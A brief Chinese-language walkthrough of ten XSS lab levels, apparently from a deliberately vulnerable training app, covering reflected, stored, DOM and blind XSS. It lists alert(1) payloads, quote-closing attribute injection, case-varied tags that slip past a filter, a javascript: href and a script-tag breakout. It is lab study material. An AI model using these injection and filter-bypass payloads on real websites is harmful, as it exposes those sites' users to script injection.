1.反射型xxs(get)
在搜索框输1界面有停留 进行xxs攻击
输入时发现长度不够 F12打开控制台修改
输入<script>alert(1)</script>
2反射型xxs(post)
点击提示进行登录
输入<script>alert(1)</script>
3存储型xxs
输1停留界面
输入<script>alert(1)</script>
4.DOM型xxs
输入οnclick='alert(1)'发现报错
点击F12打开控制台
利用单引号闭合'οnclick='alert(1)'
5.DOM型xxs-x
同上一关一样'οnclick='alert(1)'点击两次弄出弹窗
6.xxs之盲打
输入<script>alert(1)</script>
登录进入后台
7.xxs之过滤
输入<script>alert(1)</script>没有弹窗,点击F12进行查看
输入'<script>alert(1)</script>没有弹窗
输入'<sCript>alert(1)</sCript>
8.xss之htmlspecialchars
输入οnclick='alert(1)'页面报错
F12控制台查询
输入'οnclick='alert(1)'时 页面出现弹窗
9.xss之href输出
输入javascript:alert(1)
10.xss之js输出
<script>alert(1)</script>,F12打开控制台
</script><script>alert(1)</script>
